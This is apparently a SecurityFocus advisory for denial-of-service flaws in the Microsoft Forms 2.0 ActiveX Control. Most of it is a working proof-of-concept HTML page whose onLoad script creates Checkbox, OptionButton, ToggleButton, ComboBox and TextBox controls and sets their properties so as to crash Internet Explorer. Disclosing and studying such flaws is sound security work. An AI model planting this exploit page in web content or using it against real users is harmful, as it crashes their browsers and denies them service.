source: https://www.securityfocus.com/bid/26414/info
Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities.
Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.
Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0.
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj;
//Forms.Checkbox.1
obj = new ActiveXObject("Forms.Checkbox.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.OptionButton.1
obj = new ActiveXObject("Forms.OptionButton.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.ToggleButton.1
obj = new ActiveXObject("Forms.ToggleButton.1");
obj.Caption = "A";
obj.GroupName = "A";
obj.Accelerator = "A";
//Forms.ComboBox.1
obj = new ActiveXObject("Forms.ComboBox.1");
obj.Text = "A";
obj.Value = "A";
//Forms.TextBox.1
obj = new ActiveXObject("Forms.Textbox.1");
obj.Text = "A";
obj.Value = "A";
obj.SelStart = 1;
}
</script>
</head>
<body onLoad="JavaScript: return Check();" />
</html>